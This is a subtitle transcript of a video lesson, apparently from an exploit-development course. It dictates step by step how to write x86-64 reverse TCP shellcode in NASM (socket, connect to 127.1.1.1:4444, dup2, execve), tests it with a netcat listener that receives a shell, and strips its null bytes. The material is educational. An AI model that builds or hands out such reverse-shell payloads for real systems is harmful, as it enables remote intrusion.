WEBVTT

00:00.390 --> 00:02.560
This is where we left off in the previous video.

00:03.050 --> 00:12.270
Let us exit from here and let's create a new file called reverse-tcp.nasm.

00:13.920 --> 00:23.430
And as usual, let's start with the text section and let's use a global directive to specify our entry

00:23.430 --> 00:26.970
point and let's specify our entry point.

00:27.990 --> 00:31.500
Now, let's close this file and.

00:33.310 --> 00:43.540
Let's run strace once again and let's just copy this output and let's keep it inside our

00:43.840 --> 00:52.070
reverse-tcp.nasm file temporarily; we can use this output to craft our assembly program.

00:53.050 --> 00:57.110
The first thing is to clear all the registers that we are going to use.

00:57.640 --> 01:01.150
So let's write: clearing out

01:02.940 --> 01:06.370
the registers.

01:07.110 --> 01:23.340
So let's just clear them: xor rax, rax; xor rdi, rdi; xor rsi, rsi; and finally

01:23.460 --> 01:26.880
xor rdx, rdx.

01:27.390 --> 01:31.140
So in each case, RAX is going to hold the syscall number.

01:31.140 --> 01:36.090
Now, RDI is going to hold the first argument to the syscall.

01:36.900 --> 01:43.440
RSI is going to hold the second argument to the syscall and RDX is going to hold

01:43.470 --> 01:45.270
the third argument to the syscall.

01:45.960 --> 01:46.400
All right.

01:46.590 --> 01:49.620
So let's begin by writing the socket syscall.

01:53.240 --> 02:00.600
Now, the first step is to find out the syscall number, so let's open up a new tab and find out our syscall number.

02:01.370 --> 02:07.590
So I'm just going to use locate unistd_64.

02:09.170 --> 02:13.850
And this is the file which contains our syscall numbers.

02:14.420 --> 02:19.100
So let's use cat and grep for socket.

02:20.480 --> 02:21.010
There it is.

02:21.380 --> 02:24.370
41 is the syscall number for socket.

02:24.890 --> 02:29.220
So let's use add rax, 41.

02:30.230 --> 02:35.700
So this is the syscall number for socket.

02:36.500 --> 02:37.670
That's the syscall number.

02:37.700 --> 02:41.290
Now let's set up the first argument for the socket syscall.

02:41.930 --> 02:49.490
If you remember, the first argument of the socket call is AF_INET; it's a constant value for

02:49.490 --> 02:52.700
IPv4 connections and its value is always two.

02:53.210 --> 02:58.900
So we are going to use add rdi, 2.

02:59.150 --> 03:02.820
So the first argument of socket call is ready.

03:03.470 --> 03:10.610
Now the next argument is going to be SOCK_STREAM, and SOCK_STREAM's

03:10.610 --> 03:12.290
value is defined to be one.

03:12.410 --> 03:13.800
This is also a constant.

03:14.150 --> 03:19.370
So let's use add rsi, 1.

03:20.060 --> 03:23.080
And finally we will have to set up RDX.

03:23.090 --> 03:26.490
And if you remember, the RDX value should be zero.

03:27.140 --> 03:27.890
Why is that?

03:28.130 --> 03:34.420
Because if you look at the reverse shell C program, the third argument always contains zero.

03:34.940 --> 03:37.030
So that's what we are going to place.

03:37.040 --> 03:42.170
And if you notice, RDX already contains zero, so we don't have to do anything now.

03:42.590 --> 03:46.600
Now all we have to do is use the syscall instruction.

03:47.060 --> 03:54.410
So once this is done, the syscall number 41, which is socket, is going to be executed with the arguments

03:54.410 --> 03:55.770
that we have just set up.

03:56.480 --> 03:59.270
Now, there is one important thing that we need to remember here.

03:59.840 --> 04:06.500
Once this syscall is executed, the return value will be stored in the RAX register.

04:07.130 --> 04:11.390
This is the return value when we were executing the program using strace.

04:11.630 --> 04:17.250
But now we don't know what the return value is, so we have to capture what we are getting in the RAX

04:17.300 --> 04:17.820
register.

04:18.380 --> 04:24.260
So let us quickly use mov rdi, rax.

04:24.620 --> 04:31.670
So after executing this syscall, we are capturing the return value, which is stored in the RAX register, in

04:31.680 --> 04:32.990
the RDI register.

04:33.500 --> 04:35.660
Why are we storing it in the RDI register?

04:36.020 --> 04:42.800
We can actually use any register, but the RDI register is being used because in most of the cases this

04:42.800 --> 04:48.320
return value is the first argument and the first argument always goes into RDI.

04:48.650 --> 04:53.480
And that's the reason why we are using RDI to store it here, so we don't have to move it again from

04:53.480 --> 04:58.700
a different register into RDI; we just place it directly into the RDI register here.

04:59.240 --> 05:03.440
Now let's look at a pictorial representation of our next steps.

05:03.830 --> 05:06.670
So I'm opening up my slide area.

05:07.550 --> 05:13.730
If you remember, we are done with this socket call: the RAX register contains the value 41,

05:14.240 --> 05:20.050
RDI contains two, RSI contains one and RDX contains zero.

05:20.540 --> 05:26.510
So we are done with the socket call and it returns some value, which is going to be placed in RAX.

05:26.890 --> 05:32.630
Immediately, when we execute the other syscalls, connect and dup2,

05:32.990 --> 05:37.280
we are going to change this value inside our RAX register.

05:37.580 --> 05:42.680
So we are just immediately saving it into a different register, which is RDI in this case.

05:43.310 --> 05:50.270
And this value, which is stored in RDI, is going to be used in the dup2 calls as well as in the connect call.

05:51.150 --> 05:55.820
So the next step after the socket call is to write the connect call.

05:56.570 --> 06:03.290
When we write this connect call, the RAX register contains the syscall number, and 42 is the syscall number

06:03.290 --> 06:04.240
for connect.

06:04.490 --> 06:06.020
We can quickly check that.

06:07.850 --> 06:10.190
Let's grep for connect this time.

06:12.830 --> 06:16.600
There you go, 42 is the syscall number for connect.

06:17.330 --> 06:23.440
Similarly, 33 is the syscall number for dup2.

06:24.260 --> 06:25.760
Let's go back to our slides.

06:26.300 --> 06:27.660
Here we are:

06:27.740 --> 06:30.290
33 is the syscall number for dup2.

06:30.590 --> 06:35.660
So when we write this dup2 call, we are going to place 33 in the RAX register.

06:36.140 --> 06:41.750
And when we write this connect call, we are going to place the value 42 into the RAX register.

06:42.380 --> 06:45.410
And the first argument is RDI in both the cases.

06:45.680 --> 06:49.730
And the value is already stored here from RAX.

06:50.000 --> 06:52.330
So we don't have to set up the first argument

06:52.540 --> 07:00.070
anymore when we write this connect call and the dup2 calls. Now, the second argument for connect, which

07:00.070 --> 07:05.480
is RSI, if you remember, this is the address of a structure.

07:06.070 --> 07:09.160
So first, we will have to prepare the structure.

07:09.610 --> 07:14.160
And in the RSI register, we are going to place the address of that structure.

07:14.980 --> 07:18.580
So to prepare the structure, if you remember, we need three things.

07:18.880 --> 07:26.380
The IP address, the port and the sin_family, which is AF_INET; if you remember, that's a

07:26.380 --> 07:28.200
constant with the value two.

07:28.720 --> 07:30.600
So we will have to place them in this order.

07:31.060 --> 07:33.430
First, we are going to push 127.1.1.1.

07:33.430 --> 07:35.280
That is, 127 dot 1 dot 1 dot 1.

07:36.040 --> 07:40.390
After that, we are going to push a word which is 4444.

07:40.870 --> 07:44.610
And after that we are going to push another word, which is two.

07:45.400 --> 07:46.480
So let's do that.

07:46.540 --> 07:53.770
So this prepares our structure, and once the entire structure is placed on the stack, RSP points

07:53.770 --> 07:57.220
to it, like we did in the case of the execve shellcode.

07:57.460 --> 08:03.040
We can simply move this RSP into RSI and that will point to this structure.

08:03.700 --> 08:06.580
And finally, RDX contains 16.

08:06.790 --> 08:08.800
We got this value from strace.

08:09.730 --> 08:10.220
All right.

08:10.240 --> 08:11.390
So that's pretty much it.

08:11.470 --> 08:14.620
This is the only complicated part that we are left with.

08:14.920 --> 08:18.870
Once we are done with this connect call, everything will be very straightforward.

08:19.390 --> 08:23.700
So let's go ahead and prepare this structure and write this connect call.

08:24.130 --> 08:32.470
So I am switching to my virtual machine and let's start writing our structure: preparing the structure

08:33.310 --> 08:35.090
for connect.

08:36.430 --> 08:36.900
All right.

08:36.910 --> 08:39.880
So let's use push.

08:41.150 --> 08:45.380
We want to push 127.1.1.1.

08:46.000 --> 08:58.750
So one should be 0x01, and this one is going to be 0x01, and the next one is going to be

08:58.780 --> 08:59.530
0x01.

09:00.010 --> 09:04.740
And finally, 127 is going to be 7F in hex.

09:06.520 --> 09:07.690
Let me quickly show that.

09:10.850 --> 09:19.920
127 decimal is 7F in hex. The next step is to push this port number, 4444.

09:20.480 --> 09:26.650
Let's quickly check the hex equivalent of this four four four four.

09:28.250 --> 09:35.150
It becomes 0x115C, so we will have to use the reverse order once again, so I'm just using push

09:36.320 --> 09:40.310
word 0x5C11.

09:41.150 --> 09:47.380
And the next one is to use push word; the value is going to be two for this AF_INET.

09:47.690 --> 09:50.200
So we are just going to push 0x2.

09:50.900 --> 09:51.290
All right.

09:51.350 --> 09:53.770
So that should prepare our structure.

09:54.290 --> 09:58.460
If you remember, this is what is expected on the stack.

09:58.850 --> 10:03.880
So let's quickly debug the program and check if this is placed on the stack.

10:04.250 --> 10:08.720
Let's go back to the VM and quickly debug the shellcode that we have written so far.

10:10.070 --> 10:22.310
I'm saving this file and let's use nasm reverse-tcp.nasm -o reverse-tcp.o

10:22.310 --> 10:26.150
-f elf64.

10:27.710 --> 10:34.910
There are some errors here, probably because of these comments, so let's just comment them out.

10:37.880 --> 10:38.420
There you go.

10:38.570 --> 10:47.750
Now let's try to assemble once again; yep, everything works fine. Now let's link

10:48.320 --> 10:50.950
reverse-tcp.o with ld.

10:52.160 --> 11:00.500
Now let's use gdb ./reverse-tcp, and let's set up a breakpoint at _start,

11:00.500 --> 11:01.770
and run the program.

11:03.230 --> 11:04.280
Let's do a stepi.

11:04.670 --> 11:10.160
What we want to check is whether we are properly placing the structure on the stack or not.

11:16.620 --> 11:23.640
All right, we are here at the syscall, and this is where we are storing our return value in the RDI

11:23.640 --> 11:24.150
register.

11:24.630 --> 11:27.710
After that, we are using these push instructions.

11:28.110 --> 11:33.780
So after completing this push word instruction, we should have the proper stack set up.

11:34.200 --> 11:40.740
So let's stepi once again, and once again, and once again.

11:41.340 --> 11:46.620
If you notice the top of the stack after pushing all the three values, this is what we have.

11:47.100 --> 11:53.190
If you go back to the slide, we have exactly the same thing, starting with zero one, ending with

11:53.190 --> 11:57.820
zero two, starting with zero one, ending with zero two.

11:58.230 --> 11:59.010
So there it is.

11:59.350 --> 12:03.090
We have properly placed the structure on the top of the stack.

12:03.540 --> 12:07.860
Now, this top of the stack is being pointed to by the RSP register.

12:08.100 --> 12:14.520
So now all we have to do is move the value of the RSP register into RSI.

12:14.940 --> 12:17.760
So let's construct our connect call.

12:19.470 --> 12:25.810
I'm quitting this debugger and let's go back to the editor once again.

12:26.850 --> 12:31.260
Let's go down; let's write connect.

12:32.660 --> 12:39.180
And the first step is to move the top of the stack into RSI.

12:40.460 --> 12:43.600
So this is the second argument to the connect call.

12:44.360 --> 12:49.340
If you remember, the first argument is RDI, which already has the required value.

12:49.880 --> 12:55.030
And finally, the third argument is going to be 16, which is the size of the structure.

12:55.310 --> 12:58.040
So that goes into RDX.

13:00.260 --> 13:02.180
16 is 0x10 in hex.

13:02.180 --> 13:04.550
So we are going to use 0x10 here.

13:05.450 --> 13:11.220
Once this is done, we will have to prepare the syscall number in the RAX register for the connect call.

13:11.780 --> 13:19.370
So let's first clear out RAX because it contains the return value from the previous call, which is

13:19.370 --> 13:20.000
socket.

13:20.780 --> 13:30.260
Now let's add the value 42, which is the syscall number for the connect syscall, and let's just type syscall.

13:30.770 --> 13:33.220
So that finishes our connect call.

13:33.590 --> 13:36.540
So we are done with the socket call and we are done with the connect call.

13:37.040 --> 13:40.240
Now the next couple of calls are pretty easy to do.

13:40.880 --> 13:55.220
dup2 is what we are going to do next: dup2 STDIN, dup2 STDOUT and dup2 STDERR.

13:56.090 --> 14:05.300
Let's begin with STDIN. I'm just going to clear out the RAX register once again and I'll just add this

14:05.300 --> 14:08.260
syscall number into RAX, which is 33.

14:09.590 --> 14:18.390
And then I will just clear the RSI register; RDI already contains the socket file descriptor.

14:18.410 --> 14:21.360
The second argument for STDIN is zero.

14:21.830 --> 14:25.460
So we are just making RSI zero by using the xor instruction.

14:25.760 --> 14:27.920
So dup2 STDIN is already done.

14:28.520 --> 14:31.010
All we have to do is invoke the syscall.

14:32.990 --> 14:35.630
Next is STDOUT.

14:35.990 --> 14:44.450
Once again we will do xor rax, rax; add rax, 33.

14:45.740 --> 14:51.920
We will have to do this again because when you execute this syscall the return value will be placed in

14:51.920 --> 14:54.550
the RAX register, so it won't have 33 anymore.

14:54.800 --> 14:58.840
So we are just setting up 33 once again in the RAX register.

14:59.750 --> 15:09.110
Once this is done we can just use add rsi, 1, because for STDOUT the second argument is

15:09.110 --> 15:12.130
one; currently RSI contains zero.

15:12.140 --> 15:13.370
So we are just adding one.

15:15.110 --> 15:18.530
And once this is done, we can once again execute the syscall.

15:19.580 --> 15:26.400
After all of this, let's write the dup2 STDERR call, which is going to be xor

15:26.570 --> 15:30.490
rax, rax; add rax,

15:30.500 --> 15:38.600
33 once again; and then add rsi, 1, because currently RSI contains one.

15:38.900 --> 15:41.300
So we are just adding one to that.

15:41.310 --> 15:44.520
So it becomes two, which is the value for STDERR.

15:45.920 --> 15:49.300
And finally, just call syscall.

15:50.000 --> 15:50.530
That's it.

15:50.570 --> 15:51.890
We are done with writing

15:51.890 --> 15:53.260
all these syscalls now.

15:53.340 --> 15:54.950
The last one is execve.

15:55.350 --> 15:59.270
We are just going to copy it from the previous shell code that we have written.

15:59.840 --> 16:00.830
So let's use

16:06.470 --> 16:13.040
this file, which is execve.nasm, and let's just copy it from here.

16:15.550 --> 16:20.540
And let's go back to reverse-tcp.nasm, and let's paste it here.

16:21.250 --> 16:21.770
That's it.

16:21.790 --> 16:23.190
So we are done with the reverse

16:23.200 --> 16:28.930
TCP shellcode. Let's save the file and let's use

16:31.370 --> 16:35.550
nasm to assemble this and ld to link this.

16:36.200 --> 16:45.990
Let's quickly use a netcat listener to check if the shellcode is working fine: nc

16:46.330 --> 16:48.890
-nlvp 4444.

16:50.120 --> 16:52.830
And let's execute

16:53.150 --> 16:54.690
./reverse-tcp.

16:56.390 --> 16:59.090
Let's go back to the listener and look at that.

16:59.210 --> 17:03.820
We got a shell, so we have completed our reverse TCP shellcode.

17:04.360 --> 17:09.190
Now, obviously, the next step is to quickly verify if it has any null bytes.

17:09.620 --> 17:17.930
So let's use objdump -d reverse-tcp -M intel for Intel syntax.

17:19.550 --> 17:22.850
So it looks like there are a bunch of null bytes here.

17:23.540 --> 17:25.100
Here are three null bytes.

17:26.070 --> 17:26.880
That's pretty much it.

17:27.020 --> 17:29.660
This is the only place where we have null bytes.

17:30.590 --> 17:32.860
The RDX register should have that value.

17:32.910 --> 17:37.820
Then let's go back and check what instruction is causing these null bytes.

17:38.210 --> 17:39.700
We can actually check that here.

17:40.010 --> 17:46.070
If you see this, it's immediately after these push instructions, so it should be the connect call.

17:46.430 --> 17:48.530
So let's go back to the shellcode.

17:53.220 --> 17:56.100
And let's go to the connect call.

18:00.190 --> 18:09.850
And if you see this, we did not use RDX anywhere, so we can just use the add instruction here instead

18:09.850 --> 18:10.270
of mov.

18:14.340 --> 18:20.120
All right, so let's save the file and let's assemble and link it once again.

18:23.330 --> 18:23.930
There it is.

18:24.110 --> 18:27.710
Let's quickly check by using the netcat listener.

18:32.760 --> 18:38.490
Once again, it worked fine; let's double check if we have removed all the null bytes.

18:41.380 --> 18:47.530
Looks like we are pretty much done with the shellcode; there are no problems and there are no null bytes.

18:47.900 --> 18:52.280
However, this shellcode has some redundant instructions.

18:52.640 --> 18:55.040
For instance, look at these two instructions.

18:55.040 --> 19:02.420
We have written these two instructions multiple times: once here, once here and once here.

19:02.420 --> 19:07.670
So we have written it three times so we can optimize this shell code a bit.

19:07.970 --> 19:10.640
So let's see how we can do that in the next video.
